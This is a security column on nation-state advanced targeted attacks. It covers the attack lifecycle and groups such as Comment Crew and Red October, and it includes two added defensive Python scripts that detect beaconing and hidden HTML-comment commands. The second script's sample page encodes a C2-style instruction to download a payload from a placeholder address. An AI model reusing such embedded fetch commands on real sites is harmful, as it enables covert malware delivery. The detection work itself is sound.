Advanced Threat Protection & Visibility Series – Part 1: Advanced Threats and Nation States
Last year, Keith Alexander, the director of the National Security Agency, described cyber espionage as “the greatest transfer of wealth in history.” Now, cyber espionage has expanded its focus from military targets to mainstream corporate America—all in the form of Advanced Targeted Attacks (ATAs). Just last month, Mandiant’s APT1 report outlined in great detail how a unit of the People’s Liberation Army (PLA) has successfully stolen hundreds of terabytes of data from at least 141 organizations across 20 major industries since 2006.
In just the past few weeks, Bloomberg, the Wall Street Journal and the New York Times were penetrated by ATAs in a reconnaissance effort to find potentially damaging stories and the anonymous sources used to build them. These organizations joined an ever-increasing list of enterprise victims. Some of these enterprise attacks included the pilfering of big oil company networks by attackers seeking information on oil reserves; stolen intellectual property (IP) from California’s solar industry; the theft of sensitive client information from prominent law firms; the infiltration of nuclear power plants; stolen financial statements and executive leadership information from leading financial companies; and the theft and monitoring of user accounts at Twitter and Apple. Once an ATA gains a foothold in a network, the attackers maintain that access indefinitely, and with conventional security tools they are rarely detected.
About advanced targeted attacks
Advanced targeted attacks share several defining characteristics. They are methodical, persistent and data-focused, launched by nation states or other well-resourced actors with the objective of stealing information, not money. ATAs generally rely on one of two primary methods for initial infection and then follow a distinct post-infection methodology. Let’s look at the two infection methods first:
Method 1: Targeted spear phishing attack
Originally, attackers used generic emails for phishing attacks, often recognizable by their particularly poor grammar. Today’s attackers are targeted and sophisticated: they research their recipients thoroughly and apply advanced social engineering, drawing on Web search results and social networks such as Quora, Facebook and LinkedIn. They focus on people the recipient knows and trusts, and on topics the recipient cares about. Armed with this knowledge, they craft a phishing email with a timely, relevant subject line so that it appears to come from a trusted party. Most often the email carries either a malware-laden attachment (typically a Microsoft Office document or an Adobe PDF that exploits a vulnerability in the viewer) or a link to a site hosting an exploit. When the attachment is opened or the link followed, the malware is installed without further user action and opens a backdoor communication channel to the attackers.
Method 2: Watering hole method
In the event a targeted spear phishing attack fails (because employees are security-aware, for example), attackers often fall back on the watering hole method. They identify seemingly safe websites that employees of the target organization are likely to visit, compromise those sites, and serve malware to every visitor. They then sort through the infected machines, keeping those that belong to the targets they are interested in and discarding the rest. To date, watering hole targets have included websites for high schools, drag racing and curling clubs.
Methodology behind ATAs
Today’s ATAs follow a consistent methodology for delivery and execution. Below is an outline of the most common sequence seen in ATA attacks against both governments and corporations:
• Strategy and social engineering: Hackers put together a strategy focusing on what data they want, where it is likely to be, and who has access to it. They also consider likely defenses, building a comprehensive attack plan that begins with social engineering.
• Targeted email: A targeted malware-laden phishing email is crafted and sent to the victim.
• Attachment or link execution: The victim opens the attachment or follows the link, triggering the malware.
• Malware infiltration: The malware is installed on the compromised device.
• Command and Control beachhead: The malware beacons to a Command and Control (C2) site and receives updated instructions.
• Opening of backdoor: Attackers enter the network and establish multiple backdoors to ensure continued access.
• Stealthy presence: At this critical point attackers operate with extreme stealth, avoiding detection by, or alerts from, IDS/IPS devices.
• Privilege escalation: Attackers then work to escalate privileges in order to gain elevated access to protected resources.
• Password access: Password hashes (not encrypted passwords) are dumped from local machines and domain controllers and cracked off-line by the attackers; where pass-the-hash techniques work, cracking is not even necessary.
• Administrator access: With valid credentials in hand, attackers return to the network and operate as the organization’s own administrators, indistinguishable from legitimate activity.
• Reconnaissance: Attackers perform reconnaissance to survey, classify and gather target data.
• Data exfiltration: Data is coalesced on a staging server and then exfiltrated from the network.
• Persistence: Attackers return regularly to gather, examine and exfiltrate new data.
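The Command and Control step in the methodology above is one of the few points where the attacker has to generate traffic on a schedule of their own choosing, which is why defenders look for it. An automated implant tends to call home at a near-fixed period, whereas a person browsing the same site does not. The script below is an added example, not code from the column or from any group or vendor it names: it runs a simple interval-regularity heuristic over proxy log lines. The log format, every entry in it, the hostnames and the thresholds are constructed for the illustration.

```python
"""Beacon-regularity triage over proxy log lines (added example).

Per (client, destination host), compute the gaps between successive requests
and flag pairs whose gaps are unusually regular. Log format and all entries
below are constructed for this example; thresholds are illustrative.
"""
import re
import statistics
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlparse

# Constructed format: "<ISO-8601 timestamp> <client-ip> <method> <url>"
# One host is browsed by hand at irregular gaps; one is hit every ~300 s.
SAMPLE_LOG = """\
2013-03-04T09:00:00 10.1.2.34 GET http://intranet.example.local/home
2013-03-04T09:00:05 10.1.2.34 GET http://cdn.news.example.com/a.js
2013-03-04T09:00:07 10.1.2.34 GET http://cdn.news.example.com/b.js
2013-03-04T09:00:10 10.1.2.34 GET http://update.dl-stats.example.net/check.php?id=7a1
2013-03-04T09:01:00 10.1.2.34 GET http://news.example.com/world/1
2013-03-04T09:02:00 10.1.2.34 GET http://news.example.com/world/2
2013-03-04T09:02:30 10.1.2.34 GET http://news.example.com/world/3
2013-03-04T09:03:00 10.1.2.34 GET http://news.example.com/world/4
2013-03-04T09:05:03 10.1.2.34 GET http://news.example.com/world/5
2013-03-04T09:05:10 10.1.2.34 GET http://update.dl-stats.example.net/check.php?id=7a1
2013-03-04T09:10:08 10.1.2.34 GET http://update.dl-stats.example.net/check.php?id=7a1
2013-03-04T09:15:10 10.1.2.34 GET http://update.dl-stats.example.net/check.php?id=7a1
2013-03-04T09:20:00 10.1.2.34 GET http://news.example.com/world/6
2013-03-04T09:20:11 10.1.2.34 GET http://update.dl-stats.example.net/check.php?id=7a1
2013-03-04T09:25:10 10.1.2.34 GET http://update.dl-stats.example.net/check.php?id=7a1
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)$")


def parse_log(text):
    """Yield (timestamp, client, host) for each well-formed line."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip malformed lines rather than abort the whole run
        ts, client, _method, url = m.groups()
        yield datetime.fromisoformat(ts), client, urlparse(url).hostname


def find_beacons(text, min_requests=5, max_cv=0.10):
    """Return (client, host) pairs whose request intervals are suspiciously regular.

    cv is the coefficient of variation (stdev / mean) of the gaps between
    requests: 0 means perfectly periodic. min_requests keeps two-hit
    coincidences out; max_cv is the jitter we are willing to tolerate.
    """
    seen = defaultdict(list)
    for ts, client, host in parse_log(text):
        seen[(client, host)].append(ts)

    flagged = []
    for (client, host), stamps in seen.items():
        if len(stamps) < min_requests:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue  # all requests share one timestamp; nothing periodic to measure
        cv = statistics.stdev(gaps) / mean
        if cv <= max_cv:
            flagged.append({"client": client, "host": host, "count": len(stamps),
                            "mean_interval": mean, "cv": round(cv, 4)})
    return sorted(flagged, key=lambda r: r["cv"])


if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_LOG):
        print(f"{hit['client']} -> {hit['host']}: {hit['count']} requests, "
              f"every ~{hit['mean_interval']:.0f}s (cv={hit['cv']})")
```

On the constructed log only the update.dl-stats.example.net traffic is flagged (six requests, roughly every 300 seconds), while the hand-browsed news site has a cv well above 1. Treat the output as a triage list, not a verdict: legitimate update checkers, mail clients and monitoring agents also poll on fixed schedules, so each hit still needs the destination and the process behind it examined.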
Although the methodology has remained more or less the same, the technology used to execute ATAs has advanced rapidly. Many of the early attacks used commonly available remote access tools (RATs), such as Gh0st RAT, to control infected computers; McAfee’s Operation Shady RAT report documented one such long-running campaign. Google, for example, was one of the first companies to publicly acknowledge being targeted by an ATA, in what is now known as Operation Aurora, while the Night Dragon campaign targeted the oil and gas industry. By modern ATA standards the malware in those campaigns was primitive. In the recent attacks on U.S. media corporations, by contrast, approximately 50 pieces of custom malware were used, and new ATA platforms are emerging every day.
Who is behind ATAs?
Most ATA groups are believed to be backed by nation states and driven by the economic and geopolitical goals of their sponsors. Nation state ATAs are generally not directly financially motivated; the information they steal, however, can lead its recipients to prodigious financial gains. One example involves China’s Comment Crew (recently profiled in Mandiant’s APT1 report), which attacked European Council computers at the height of the Greek debt crisis in July 2011. A critical European Union (EU) decision was pending, and whether Greek debt would be worth next to nothing or its full face value hinged on it. Armed with advance knowledge of that decision, a nation state could make a fortune in the market for Greek debt. So, before the EU announced its decision, the Comment Crew infiltrated the email account of the President of the European Council and monitored it for several days, creating a virtual wiretap on his activities and communications.
Based on what we know, there are approximately fifteen major, active ATA crews in operation. Of them, the Comment Crew is perhaps the most notorious and prolific. Also known as Byzantine Candor, the Comment Crew was the focus of Mandiant’s recent APT1 report, which identified it as Unit 61398 of China’s People’s Liberation Army (PLA). For years, the Comment Crew has focused on commercial targets in industries and verticals critical to China’s key economic interests. Its nickname derives from its practice of embedding command-and-control instructions in the HTML comments of pages on compromised websites, which infected machines deep within ‘secure’ corporate networks then fetch and execute. To the IT security team nothing looks infected: a machine appears merely to have requested a web page, often from a geographically local site, when in reality it has begun talking to a malicious C2 server. The Comment Crew very likely has hundreds, if not thousands, of employees and, operating under state protection, is beyond the reach of international law enforcement or the threat of arrest. Today it is one of the most active nation state cyber threat groups in operation, stealing corporate and defense industry secrets worldwide.
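The detection opportunity in the Comment Crew technique is the page body itself: the request looks ordinary, but the response carries an instruction inside an HTML comment. The scanner below is an added example, not code from the column, from Mandiant, or from any implant: it pulls every comment out of a response body and tries to decode long base64-looking tokens into readable text. Base64 is a simplifying assumption here (real implants have layered their own encodings on top), and both sample pages, the command string and the 203.0.113.7 address are constructed for the illustration.

```python
"""Hidden-command extraction from HTML comments (added example).

Every HTML comment in a response body is checked for runs of base64 alphabet
long enough to carry a command; a run counts as a hit only if it decodes to
printable ASCII, which drops hex build ids and hashes that merely look like
base64. Base64 is an assumed encoding; both pages are constructed samples.
"""
import base64
import re

COMMENT_RE = re.compile(r"<!--(.*?)-->", re.DOTALL)
# Runs long enough to carry a command rather than a stray word.
B64_TOKEN_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_if_text(token):
    """Return the decoded string if token is valid base64 for printable ASCII, else None."""
    padded = token + "=" * (-len(token) % 4)
    try:
        raw = base64.b64decode(padded, validate=True)
    except ValueError:  # binascii.Error is a ValueError: bad alphabet, padding or length
        return None
    if not raw or any(not (32 <= b < 127 or b in b"\t\r\n") for b in raw):
        return None  # binary noise (hex ids, hashes, minified tokens) stops here
    return raw.decode("ascii")


def extract_hidden_commands(html):
    """Return every decodable command found inside HTML comments, in page order."""
    commands = []
    for m in COMMENT_RE.finditer(html):
        for token in B64_TOKEN_RE.findall(m.group(1)):
            decoded = decode_if_text(token)
            if decoded is not None:
                commands.append(decoded)
    return commands


# Constructed sample responses. The benign page carries a hex build id that
# matches the base64 alphabet but decodes to non-printable bytes.
BENIGN_PAGE = (
    "<html><head><!-- build 00112233445566778899aabbccddeeff --></head>\n"
    "<body><!-- main navigation starts here -->\n"
    "<p>Copyright 2013 Example Corp</p></body></html>\n"
)
# Assumed command format for the illustration; 203.0.113.7 is a documentation address.
_ASSUMED_COMMAND = b"sleep 600; get http://203.0.113.7/update.dat"
MALICIOUS_PAGE = (
    "<html><head><title>Company News</title></head><body>\n"
    "<!-- " + base64.b64encode(_ASSUMED_COMMAND).decode("ascii") + " -->\n"
    "<p>Welcome to our site.</p></body></html>\n"
)

if __name__ == "__main__":
    for name, page in (("benign", BENIGN_PAGE), ("malicious", MALICIOUS_PAGE)):
        print(name, extract_hidden_commands(page))
```

Run against the two constructed pages, the benign page yields nothing and the malicious page yields the embedded command. In practice this check belongs in a proxy or IDS content-inspection path rather than on the endpoint, and a hit on an otherwise mundane site is a strong reason to pull the requesting host for examination, since the site owner is usually a victim too.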
Another well-known ATA group is the Elderwood Gang, which has been tied to Operation Aurora as well as to attacks on the Free Tibet movement. Elderwood frequently compromises sites belonging to organizations it opposes politically (Amnesty International, for example) and uses the watering hole method to infect their visitors. It has access to an unusually large number of zero-day exploits, which it uses to harvest information from the visitors it targets. In general, the Elderwood Gang focuses on defense-related industries and on entities involved in human rights. In late December 2012, Elderwood compromised the website of the Council on Foreign Relations and used it to host an Internet Explorer zero-day exploit aimed at visitors running vulnerable versions of the browser. The Elderwood Gang is also believed to be based in China.
The 2011 breach of RSA’s SecurID technology began when employees opened a malware-laden spreadsheet, carrying an Adobe Flash zero-day exploit, that they had received by email. That breach cascaded into attacks on U.S. defense contractors, including Lockheed Martin and L-3 Communications, because the stolen SecurID data let the attackers attempt to bypass the contractors’ two-factor authentication; it ultimately cost RSA at least $66 million. The attackers used a program called HTran to relay their traffic and obscure the true location of their C2 servers. Although the group behind the attack was never publicly named, the Comment Crew is known to use HTran regularly. It has also been reported that the recent attacks on U.S. media companies were carried out to identify the sources reporters had used for stories on the wealth amassed by the families of China’s ruling elite.
Many other countries have also been targeted, especially Japan, Russia, the United Kingdom and Germany. In January 2013, another data-stealing ATA framework was uncovered, codenamed Red October. Rocra (the name given to the Red October malware) shows how streamlined the data theft methodology of today’s advanced targeted attacks has become. Its main purpose appears to be gathering classified information and geopolitical intelligence, and it has dedicated modules for each element of an ATA: malware infiltration, privilege escalation, reconnaissance, persistence, and data collection and exfiltration. Rocra can even recover data from connected USB drives and mobile phones, including iPhones. In short, a vast amount of research and development is going into today’s ATA platforms, and the rewards for data theft are staggering: by stealing secrets, countries have leapfrogged other countries with great success.
ATA Focus in 2013
The focus of attacks by the Comment Crew—and other ATA crews—is almost always on enterprise trade secrets or any classified information that can give nation states a competitive advantage. In today’s global market, nation states are focused on eroding the advantages of their competitors and adversaries. And, if identified as a stepping stone to their primary objectives, most any enterprise could be a target. Every day, multiple targets are being attacked across the financial, energy, media, high-tech, pharmaceutical, manufacturing, national defense, biotechnology and food industries.
As a result, proprietary information and intellectual property are being vacuumed up from U.S. companies at an unprecedented rate, and the rate is only increasing. As outlined in my last column, organizations must focus on preparing for the inevitability of ATAs. This includes gaining the security intelligence, visibility, content and context needed to reduce the window of opportunity for advanced malware and attacks. In the next column, we will investigate other network usurpers, while taking a closer look at the CRIME methodology for detecting and dealing with advanced threats on the network. The CRIME methodology includes: Context, Root Cause, Impact, Mitigation and Eradication of ATAs from our networks.